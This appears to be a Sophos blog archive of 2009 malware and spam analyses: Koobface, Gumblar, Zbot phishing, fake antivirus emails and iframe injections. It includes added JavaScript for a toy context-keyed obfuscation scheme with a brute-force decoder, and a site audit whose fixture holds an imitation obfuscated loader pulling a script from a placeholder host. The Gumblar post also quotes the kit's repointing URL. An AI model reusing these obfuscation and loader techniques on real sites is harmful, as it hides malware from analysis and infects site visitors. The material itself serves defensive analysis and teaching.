Sophos

Archive for the ‘Malware’ Category

You are today’s Macbook Air Winner !

SophosLabs were today's MacBook Air winners, according to the cyber criminals. We received loads of these congratulation emails in our spam traps today. They were spamming out malicious attachments, which Sophos detects as Troj/Agent-LNC.

The email came with a zip file attached called winner.zip (detected as Troj/SpefZp-A). Here is a sample of the email.

The email pretends to come from "Media Service", and you can clearly see the typo in the message. All this marks it as definite spam.

Sophos also proactively blocks the malware as Mal/FakeAV-AX.

Please don't click on any such fake congratulation emails in your inbox or junk folder. If you ignore this warning and open the attachment thinking you have won a MacBook Air, the only gift you will receive is malware.


Koobface, new promises?

Koobface started life as a worm spreading through social networking sites and has gone on to attack Facebook, MySpace, Twitter, Bebo, hi5, GeoCities and Friendster, among the more prominent ones.

Recently I came across what could possibly be the next iteration of Koobface, W32/Koobfa-O, which came with Skype hacking functionality and some additional promises for the future. The new variant of Koobface attacks Skype accounts on the compromised machine to get various pieces of information about the victim using the different Skype API commands. The following screenshot demonstrates a few:

W32/Koobfa-O collects information about the user such as HOMEPAGE, ABOUT, PHONE_MOBILE, PHONE_OFFICE, PHONE_HOME, CITY, COUNTRY, BIRTHDAY, FULLNAME, PSTN_BALANCE etc. The collected information is dumped into a file which is packed as a RAR archive and either emailed or uploaded to a remote server. The worm then logs on to Skype chat as the user and starts a conversation with friends online. In the body of the worm there are snippets of conversation in 18 different languages including some Asian languages. The following screenshot shows a snippet of available conversation items in English:

I initially expected that there might be some lexical analysis being done to talk somewhat intelligently with the person at the other end of the chat, but it seems the worm pastes conversation pieces fairly randomly. This will be because the worm supports conversation in 18 languages, and it is too complicated to do a lexical analysis for the different languages. It is easier to just randomly chat. The worm will also paste a link to a compromised domain in the chat conversation, visiting which will download W32/Koobfa-O.

W32/Koobfa-O also does something that hints at functionality to come.

Koobface already attacks Facebook and MySpace, so those two on the list are no big surprises. The list contains new additions: blogger.com, wikipedia.org, youtube.com, yahoo.com and google.com. The worm doesn’t do much except look to see if some information (possibly credentials) exists for these domains. But is this a promise for the future? Clearly as social networking and collaborative sites/tools multiply in number and become bigger, more malware will attempt to take advantage of them.


Malware, but only for a second in a day

Malware authors and software protectionists alike go to great lengths to obfuscate and contort their code in an attempt to hide its true nature [1,2]. The assumption is that if neither human nor machine can readily make sense of the code, analysis takes longer and the bad guys get a free run in the meantime.

For the most part such obfuscations (JavaScript ones in particular) are relatively easy to unravel, because they are static transformations [3]. The more complex encrypted forms require some kind of script emulator (or your browser of choice) and a skilfully inserted alert() in place of the eval(). However, a new form, akin to the one-time-pad concept, is now being deployed.

Script obfuscated and encrypted with contextual data

Such quasi one-time encryptors work by generating and encrypting the content on demand, choosing a key that is a function of the download environment, such as the Referer header or the Last-Modified time. When the script is rendered in the victim's browser, all the information needed to decode it correctly is present. But by the time a customer submits that script for analysis the environment has long since gone, and without it the script is nearly impossible to decode.

Thus examining the script on Friday 13th (13/11/2009) at 11:08:23 yields (poorly) decrypted content which does not render.

Script decoded with wrong key

Yet behold: at the 47th second of the 7th day of each month the script decodes correctly and reveals its secrets, which here amount to deciding whether to serve a (quite likely malicious) PDF or a Flash element.

Correctly decoded given context

Static offline analysis of such scripts is easily thwarted, however any scanning engine which has access to the HTTP data stream should be able to cope since it has all the relevant contextual data required at the time of rendering.

Brute-forcing aside, the only real way to tackle this problem is "just in time" (on-access) detection at the moment the page is rendered; failing that, NoScript remains your best protection.
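To make the mechanism concrete, here is an added toy version of such a context-keyed script, written for this page rather than taken from the sample analysed above. It derives a repeating XOR key from the day of the month and the second at which the script runs (an assumed key function; the real script's derivation is not reproduced here), so the constructed payload decodes only at the 47th second of the 7th. It also shows the brute-force fallback mentioned above: with a key space this small (31 days by 60 seconds), an analyst can try every context and keep the one candidate that decodes to something recognisably script-like.

```javascript
// Added example, not code from the sample analysed above: a toy context-keyed
// script. The key is derived from the day of the month and the current second
// (an assumed key function; the real script's derivation is not reproduced),
// so the payload decodes only at the 47th second of the 7th of each month.

function deriveKey(dayOfMonth, second) {
  // zero-padded "DDSS": 7th day, 47th second -> "0747"
  return String(dayOfMonth).padStart(2, "0") + String(second).padStart(2, "0");
}

// Repeating-key XOR over bytes; symmetric, so it both encrypts and decrypts.
function xorBytes(bytes, key) {
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    out[i] = bytes[i] ^ key.charCodeAt(i % key.length);
  }
  return out;
}

const enc = new TextEncoder();
const dec = new TextDecoder("utf-8", { fatal: false });

// Constructed stand-in for the attacker's redirect logic (serve a PDF or Flash).
const PAYLOAD = 'document.write("<object data=/x.pdf type=application/pdf></object>");';

// What the server would have emitted for a download on the 7th at second 47.
const CIPHERTEXT = xorBytes(enc.encode(PAYLOAD), deriveKey(7, 47));

// What the delivered script does at run time: decode with the *current* context.
function decodeAt(cipher, date) {
  return dec.decode(xorBytes(cipher, deriveKey(date.getDate(), date.getSeconds())));
}

// Analyst fallback once the environment is gone: try every (day, second) and
// keep the candidates that decode to something recognisably script-like.
function bruteForce(cipher, marker = "document.write(") {
  const hits = [];
  for (let day = 1; day <= 31; day++) {
    for (let sec = 0; sec <= 59; sec++) {
      const text = dec.decode(xorBytes(cipher, deriveKey(day, sec)));
      if (text.includes(marker)) hits.push({ day, sec, text });
    }
  }
  return hits;
}

// Friday 13/11/2009 at 11:08:23 gives garbage that will not render...
console.log(decodeAt(CIPHERTEXT, new Date(2009, 10, 13, 11, 8, 23)));
// ...while the 47th second of the 7th decodes to the payload.
console.log(decodeAt(CIPHERTEXT, new Date(2009, 10, 7, 11, 8, 47)));
console.log(bruteForce(CIPHERTEXT));
```

Run it with node: the first line printed is garbage for the Friday 13th context, the second is the payload, and the brute force returns exactly one (day, second) pair. The search works here only because the key space is tiny and the plaintext contains a recognisable marker; a key that also mixes in the Referer or Last-Modified value makes the space far larger, which is why on-access detection with the live HTTP context in hand is the more dependable answer.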


Alert! Conflicker detected! … or is it?

Today we have spotted a batch of messages arriving in our spam systems titled “Conflicker.B Infection Alert”. The message goes like this:

Dear Microsoft Customer,

Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

The fact that the so-called antispyware program arrives attached to the email is a good indication that something is not right.

When the attached program was executed it did not start a "free system scan" as claimed; instead it simply moved itself into other folders on the system and set itself up to be started automatically at Windows startup.

Not surprisingly, the attached file is detected by Sophos as Mal/FakeAV-AX and the email message has also been blocked.

This is another example of social engineering tricks employed by malware authors to capitalize on fears of the user to entice them into running malicious software.

As always with email, think twice before running anything that arrives as an attachment.


Famous chip shop website battered by malicious Iframe injection

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the famous chip shop brand Harry Ramsden’s website had been haked by a malicious iframe. I codn’t believe it when I saw that the mootools.js script on the site is infected with Troj/Iframe-DF meaning that the website isn’t the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany which, when you go there, redirects you to a fake Google site registered in the EU, triggering Troj/ObfJS-R.

I don’t want to carp on about the responsibilities of Web masters and Web hosters but they really have to protect their sites as well as tuna them up.

All this talk of fish’n'chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)


Gumblar revisited

Readers may have noticed some of the recent rumours about new Gumblar-related activity (see for example here or here). The original Gumblar attack (May 2009) involved the mass-defacement of huge numbers of legitimate sites with a malicious script Sophos products blocked as Troj/JSRedir-R. The purpose of this was to infect users with a data-stealing Trojan known as Troj/Daonol-Fam.

The payload of the recent attacks looks similar, the malicious binaries now being detected as Mal/Daonol-A.

As with the previous wave of site defacements, it appears to be stolen FTP credentials that are driving the new attacks. These let the attackers upload malicious PHP scripts, which are then used to construct the attack. Unlike the previous attacks, the payload is now also hosted on compromised hosts, which makes the attacks more resilient.

At the end of last week, we managed to get hold of one of the key PHP script components being used by the attackers. Analysis of the script gives us some interesting insights into these attacks.

The PHP script can be used by the attackers to inject a malicious script into all suitable pages on the victim site. Files below ~200kB whose extension does not match any of the following are targeted (up to a maximum of 5 within any particular directory):

  • .zip
  • .rar
  • .gz
  • .jpg
  • .gif
  • .avi
  • .mp3
  • .wma
  • .mpg
  • .png
  • .txt
  • .swf
  • .css
  • .js
  • .log
  • .pdf
  • .ppt
  • .fla
  • .as
  • .tar

Some simple techniques are used to make the injected scripts mildly polymorphic (between each injected page). These include function/variable substitution and simple string obfuscation.

The purpose of the injected script is simple - adding a script element to the page which will cause the browser to load further malicious content from a remote server (hosted on another compromised site).

The PHP script makes it trivial for the attackers to change the redirection payload of the scripts injected into pages: an HTTP request to the PHP script with the desired target domain in the query string is all that is required. So, requesting http://compromised_site_A/path/gumblar.php?dom=compromised_site_B will result in:

  • removal of any injected scripts previously added to suitable pages on compromised_site_A
  • injection of new scripts, whose payload will be to load content from compromised_site_B

This makes the new wave of attacks more resilient to URL filtering, since the destination can be re-pointed at will. Sophos customers are protected: aside from the payload being detected as Mal/Daonol-A, pages injected with the redirection scripts are blocked as Troj/JSRedir-AE. Indications at this point are that a large number of sites have been affected; the detection already accounts for almost 4% of all web-based threats seen in the past 48 hours.

Additionally, detection for the malicious PHP scripts uploaded to compromised sites has been added as Troj/PHPMod-B. If you are a webmaster or hosting provider and encounter this detection, please let us know. It would be interesting to collect further samples of the PHP kits being used.
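As an added illustration (this is neither the attackers' PHP kit nor Sophos code), the following Node.js audit applies the targeting rules described above to a list of site files and, among the files the kit would have touched, flags pages carrying either a script element pulled from a foreign host or an inline script built from the idioms such injected loaders rely on (document.write, unescape, String.fromCharCode, createElement('script'), eval). The file list, the hostnames and the "injected" snippet are constructed for the example; the order in which the kit applies its five-per-directory cap is an assumption, since the post does not say.

```javascript
// Added example, not the attackers' PHP kit nor Sophos code: a webmaster-side
// audit that applies the targeting rules from the post to a list of site files
// and flags pages that look like they carry an injected redirector script.

// Extensions the kit leaves alone, as listed in the post.
const SKIPPED_EXTENSIONS = new Set([
  ".zip", ".rar", ".gz", ".jpg", ".gif", ".avi", ".mp3", ".wma", ".mpg", ".png",
  ".txt", ".swf", ".css", ".js", ".log", ".pdf", ".ppt", ".fla", ".as", ".tar",
]);
const MAX_SIZE = 200 * 1024;   // "files below ~200kB"
const MAX_PER_DIRECTORY = 5;   // "up to a maximum of 5 within any particular directory"

function extensionOf(path) {
  const base = path.slice(path.lastIndexOf("/") + 1);
  const dot = base.lastIndexOf(".");
  return dot === -1 ? "" : base.slice(dot).toLowerCase();
}

function directoryOf(path) {
  const slash = path.lastIndexOf("/");
  return slash === -1 ? "" : path.slice(0, slash);
}

// Files the kit would inject, given {path, size} records. The per-directory cap
// is applied in listing order: an assumption, the post does not say how the kit
// orders its candidates.
function kitTargets(files) {
  const perDir = new Map();
  const targets = [];
  for (const f of files) {
    if (f.size >= MAX_SIZE || SKIPPED_EXTENSIONS.has(extensionOf(f.path))) continue;
    const dir = directoryOf(f.path);
    const seen = perDir.get(dir) || 0;
    if (seen >= MAX_PER_DIRECTORY) continue;
    perDir.set(dir, seen + 1);
    targets.push(f.path);
  }
  return targets;
}

// <script src="..."> elements, and inline <script> blocks without a src.
const EXTERNAL_SCRIPT = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
const INLINE_SCRIPT = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
// Idioms an injected loader uses to build a script element on the fly.
const INJECTION_IDIOMS = [
  /document\.write\s*\(/i, /createElement\s*\(\s*["']script["']/i,
  /String\.fromCharCode/i, /unescape\s*\(/i, /\beval\s*\(/i,
];

// Report script elements pulling from a foreign host, and inline scripts that
// use two or more loader idioms (one alone is common in legitimate pages).
function suspiciousScripts(content, ownHost) {
  const hits = [];
  for (const m of content.matchAll(EXTERNAL_SCRIPT)) {
    let host;
    try { host = new URL(m[1], `http://${ownHost}/`).hostname; } catch { continue; }
    if (host !== ownHost) hits.push({ kind: "external", detail: m[1] });
  }
  for (const m of content.matchAll(INLINE_SCRIPT)) {
    const idioms = INJECTION_IDIOMS.filter((re) => re.test(m[1])).length;
    if (idioms >= 2) hits.push({ kind: "inline", detail: m[1].slice(0, 60) });
  }
  return hits;
}

// Audit only the files the kit would have touched; a modified file outside that
// set needs a different explanation.
function audit(files, ownHost) {
  const targets = new Set(kitTargets(files));
  return files
    .filter((f) => targets.has(f.path))
    .map((f) => ({ path: f.path, hits: suspiciousScripts(f.content, ownHost) }))
    .filter((r) => r.hits.length > 0);
}

// Constructed sample site (not real data); the "injected" snippet imitates the
// obfuscated loader described in the post, pointing at a placeholder host.
const INJECTED =
  '<script>var q=String.fromCharCode(115,99,114,105,112,116);' +
  'document.write(unescape("%3C"+q+" src=http://compromised-site-b.example/x.php%3E%3C/"+q+"%3E"));</script>';
const SAMPLE_FILES = [
  { path: "index.html", size: 4096,
    content: '<html><head><script src="/js/site.js"></script><script>var a=1;</script></head></html>' },
  { path: "about/team.php", size: 8192, content: "<html><body>team</body>" + INJECTED + "</html>" },
  { path: "js/site.js", size: 1024, content: "var a='b';" },          // skipped: .js
  { path: "about/big.html", size: 300 * 1024, content: INJECTED },    // skipped: too large
];

console.log(JSON.stringify(audit(SAMPLE_FILES, "www.example.com"), null, 2));
```

On a real site the SAMPLE_FILES array would be produced by walking the document root (fs.readdirSync and fs.statSync), and the report is a triage list rather than a verdict: the injected scripts are mildly polymorphic, so string matching on a particular variant is fragile, which is why the inline check looks for the loader idioms rather than for a specific snippet.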


Fake Facebook e-mail “Subject: updated account agreement”

It has been a busy week so far for the writers of e-mail exploits and this Friday morning they continue to try to trick the public into installing their malware. The latest threat to fall into the Sophos spam traps purports to come from Facebook and requests the user to update their account agreement by unzipping and executing an attached file called agreement.exe.

Dear Facebook user,

Due to Facebook policy changes, all Facebook users must submit a new, updated account agreement, regardless of their original account start date.
Accounts that do not submit the updated account agreement by the deadline will have restricted.

Please unzip the attached file and run “agreement.exe” by double-clicking it.

Thanks,
The Facebook Team

Of course we all know that it is pure folly to unzip and run an unknown executable attached to an e-mail. However, the implied threat of finding their access to Facebook restricted by 'the deadline', whenever that may be, is evidently enough to panic a number of Facebook users into falling for this trick.

They really should think twice: by agreeing to install agreement.exe, they will install a Trojan.

Sophos detects this threat as Troj/Dloadr-CWS.


Is it art? Controversy over OSX/LoseGame-A

Last week, SophosLabs released detection for OSX/LoseGame-A, and following Symantec's publication of their own detection (which they call OSX.Loosemaque) there has been some controversy about whether this is a game or malware (see 1, 2, 3).

From my point of view this is malware. Why?

  1. The warning screen is not multilingual: even if English is not your first language, you will still recognize 'PRESS ANY KEY TO CONTINUE' and press on without having understood the warning.
  2. Even if English is your first language, a child looking for games on the computer will not read the warning but will press through to the game.
  3. Would our corporate customers want this on their networks?

Lose Lose warning screen

The concept behind OSX/LoseGame-A is ill-conceived, and it is likely to have malicious consequences not considered by the author.


From Server/Outlook update to FDIC to facebook phish: now with a twist

In the past few weeks, the authors behind Zbot have been busy. Around October 12 we saw the server upgrade spam with links. Later, on the 14th, we saw the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages were touting Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and some irrational behaviour. After all, the thought of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the "personal FDIC insurance file" would bring nothing but grief: the bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their Facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they are shown a fake Facebook login page:

Victims who enter their Facebook login get their account details phished, probably for the purpose of spreading more malware. Since this is not a real Facebook page, any random login information brings you to this next page:

It is on this page that the malware author provides an executable for download. This file, updatetool.exe, is a Zbot executable that is proactively detected as Mal/EncPk-LE.

Given the creative social engineering the Zbot authors have been using, users should be really careful when reading messages, whether in email or from a social network. Not clicking links directly, typing the site's address manually instead, and not executing downloaded files go a long way towards protecting one's computer.


Mal/Iframe-N: Another winning infection?

Back in May, we posted some stats on the prevalence of Troj/JSRedir-R. Last week, I asked "Mal/Iframe-N: the next big threat?". Looking through our stats on malware hosted on websites this morning, I saw that Mal/Iframe-N was fifth in the overall stats for October.

Looking at the latter part of the month, from the 21st (when the detection was published) onwards:

Mal/Iframe-N is clearly first, and if the results are extrapolated for the whole month Mal/Iframe-N should easily have beaten Mal/Iframe-F into second place!

Late last week, I downloaded:

  • 2819 URIs infected with Mal/Iframe-N
  • hosted on 2294 different domains
  • with 163 different TLDs including:

.edu.in
.edu.tr
.edu.tw
.edu.ua
.ej.am
.eng.br
.es
.eu
.fi
.fr
.fr.cr
.ge
.go.th
.gov.br
.gov.pk
.gov.tr
.gr

I have corresponded with other security researchers regarding this threat (see "iframes are EVIL! Hate Zeus!"), particularly with Unmask Parasites, who has gone into more detail on this type of threat (see 1, 2) and who, like me, originally thought that the 'onload' attribute wasn't legal in an iframe. Two things changed my mind:

  1. Visiting an infected site on a goat machine.
  2. The number of infected sites (>40,000).

In some ways the second fact is more persuasive, as malware authors don't tend to do things for no reason.